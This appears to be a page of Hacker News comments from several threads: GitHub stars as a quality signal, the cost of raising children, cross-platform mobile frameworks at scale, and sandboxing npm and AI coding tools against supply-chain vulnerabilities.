They could have weekly outages, and FOSS projects would still be forced to stay on GitHub.

1 - https://ashishb.net/tech/github-stars/


I have literally never looked at GitHub stars as a measure of quality or had them affect my decision. I have looked at git logs, websites, issues, etc. But I would be genuinely worried if someone used GitHub stars as an indication. So many honestly stupid projects have a lot of stars, and stellar ones have next to none.

https://github.com/EvanLi/Github-Ranking/blob/master/Top100/...

Proof here: the top spots are taken by Chinese educational repos. Elasticsearch and Spring Boot are the only projects in the top 10 actually used by anyone. But why would I trust the stars for Spring Boot over the fact that it's used in every Java shop on the planet?


I don't rely on stars as the main signal of quality, but very low stars could stop me from looking into the things that I do use as a signal:

   - number of contributors
   - open issues
   - merged and unmerged PRs
   - commit history
   - the code
   - project governance
Some of these are also tied into GitHub rather than the git repo itself


The Hacker News crowd always has these elitist takes:

  - I don't look at GitHub Stars
  - I don't use Facebook
  - I am never persuaded by advertisement
  - I can build Dropbox over a weekend
Even if these are true, it is irrelevant. Hacker News is only a sliver of the tech world.


If I am sitting in a review session and the engineer presenting brings up their options and why they are choosing to bring in technology A over B, and I ask them what their reasoning is, being unsatisfied by "there are a lot of GitHub stars" seems like an absolutely reasonable position to me. This is the equivalent of saying that something seems more true because it has a lot of Facebook likes.


GitHub stars are not a selection mechanism. They are a filtering mechanism for most people.

Imagine someone is choosing between three FOSS projects: one has 90K stars, one has 30K, and the third has 1K.

In your meeting, the engineer will show you how they decided between the first and the second without even mentioning the third.


Good for you, champ.


Another anecdote chiming in here. I've literally never paid attention to GitHub stars for anything important. Except if a repo of a big project has few stars I double check because I'm probably looking at a fork instead of the main repo.


I came to a similar conclusion - that GitHub benefits from a network effect similar to social media. I would really like to leave GitHub, but it's where stuff is happening. Any company seriously looking to replace GitHub should pay some attention the social network aspect of it.


> Any company seriously looking to replace GitHub should pay some attention the social network aspect of it.

Indeed. And I would say it is not just social signals but even non-social authority signals.

E.g., how many other projects depend on this project and how many downloads its artifacts get.

You can see some of these on package registries like npm and pypi where their authority signals help people choose between the right libraries.


Very few people understand the depth of what you just said.

$2K or even $20K is meaningless for a parent making $100K or more.

Kids have a negative value to a professional class member.

If you engage in agriculture or some similar activity, a child as old as 10 can be a helping hand in some way or the other. No surprises that Amish farmers have a high birth rate.

https://ashishb.net/parenting/pregnancy/


It's not clear exactly what the number is, but if one observes individuals who manage to climb out of the low and middle classes and accrue a certain amount of wealth (somewhere in the ballpark of $600k-$1m net worth and up, maybe), pretty consistently not long after that achievement they've settled down and started a family.

I think for many the desire is there, but sufficient de-risking is required for them to be comfortable with acting upon it.


$600,000 net worth is nothing these days, I’m worth about that much after saving for 7 years and can’t even afford the mortgage for a $300,000 house, even if I put 20% down.

Investments are so much better at earning money than working for wages, in my case the amount of retirement savings I have after 7 years is larger than my cumulative earnings during the same period, and I’ve been saving about 40% of my gross income. Part of my net worth is ESOP equity that I can’t monetize in any way so that’s part of the reason why my net worth is higher than my earnings over the same period.


I think there's just not enough money in the country to induce more babies. The cost would be a shock. Anyone wealthy enough to shoulder the cost would fight so hard against it, it would never stand a chance. IMO the number is probably something like $10k per year per kid. Foster care pays somewhere between $8k and $12k.


There have been several iterations to have a unified way to build Android and iOS apps.

  - using HTML
  - using JavaScript
  - using JS+React
  - using Dart
  - using Kotlin
  - using Swift

This fundamentally does not work for anyone with 10M+ installs, just like you can't write Mandarin and English in one script.

This only works for devs who churn away over time as their app fails or becomes too big [1].

1 - https://ashishb.net/tech/react-native/


   > This fundamentally does not work for anyone with more than 10M+ installs just like you can't write Mandarin and English in one script.
Provably false. My bank app (Nubank) is written in Flutter, and it's one of the most used banks in Brazil (100M+ clients who rely on the iPhone or Android app, since it's a digital bank with no web interface).


Good for you.

I meant as a general rule of thumb.


Genuinely curious: What does the number of installs have to do with anything? I didn't see anything about that in the linked post (which is brief, and only about React Native), and can't figure out how popularity of an app connects to which framework is used.

Would be interested to learn how this general rule of thumb works.


You said "fundamentally", not as a rule of thumb :)


Fair point. I should have said broadly.


> This fundamentally does not work for anyone with more than 10M+ installs just like you can't write Mandarin and English in one script.

Well, I did work on a Flutter app with a tiny team between 2018-2021 and we had 15M installs, were app of the day, got featured multiple times in the App Store, got Google’s design award, were a preloaded app on iPhones in Apple Stores in several countries, and were overall doing quite well.

It was a very focused app though, so the size of our codebase didn’t really grow with the number of installs.


In the short term it can work.

Over time, maintenance becomes hard.

New iOS and Android features, sometimes backward-incompatible, are introduced.

And now you need your dependencies to implement them, which might or might not happen. At best, this makes the experience inferior. At worst, you can no longer publish an update to the app stores.


This app was started in 2017 and it is still running today and making (way more modest than back then) revenue. It’s just that I don’t work on it anymore.


Goodnotes has tens of millions of monthly-active users (not just installs) and uses Swift WASM to run the same Swift code across iOS, Android, Windows, and web.


I mean, this is "fundamentally" wrong. Shopify for example continues to use React Native [0].

[0] https://shopify.engineering/five-years-of-react-native-at-sh...


6 months back I started dockerizing my setup after multiple npm vulnerabilities.

Then I wrote a small tool[1] to streamline my sandboxing.

Now I run agents inside it to keep files outside the working directory safe.

For some tools, like the Markdown linter, I run them without network access as well.

1- https://github.com/ashishb/amazing-sandbox


Very nice! Quite a coincidence, but the NPM disaster also prompted me to build litterbox.work as a possible solution. It is a very different approach though.


Why not just use the standard Linux tool bubblewrap?


The main reason is that in addition to sandboxing, I also wanted something similar to dev-containers where I can have a reproducible development environment. I guess that can also be achieved with Bubblewrap, but when you want to run containers anyway, it seems silly to not just use Podman.


Interesting project.

This won't work on Mac, right?


Unfortunately not since it is very much designed for Linux. I imagine it should work fine inside a Linux VM on Mac though.


Of course not. But it is not needed, as Mac users are not interested in data safety.


This looks awesome! Do you have a mental process you run through to determine what gets run in the sandbox, or is it your default mode for all tools?


> This looks awesome! Do you have a mental process you run through to determine what gets run in the sandbox, or is it your default mode for all tools?

Here's what I use it for right now

  - yarn
  - npm
  - pnpm
  - mdl (a Ruby-based Markdown linter)
  - fastlane (a Ruby-based mobile app release tool by Google)
  - Claude Code
  - Gemini CLI

Over time, my goal is to run all CLI-based tools that only need access to the current directory (and not parent directories) via this.


Why not just use the standard Linux tool bubblewrap?


That's why I run it inside a sandbox - https://github.com/ashishb/amazing-sandbox


Dagger also made something: https://github.com/dagger/container-use


AFAIK, code running inside https://github.com/dagger/container-use can still access files outside the current directory.


Do you have any source for that claim? I'm curious and worried.


Does the lack of pip confuse Claude? That would seemingly be pretty big.


> Does the lack of pip confuse Claude, that would seemingly be pretty big

It has not been an issue for me. But yeah, one can always enhance and use a custom image with whatever possible tools they want to install.


I run them inside a sandbox.

The npm community is so big that one can never discard it for frontend development.

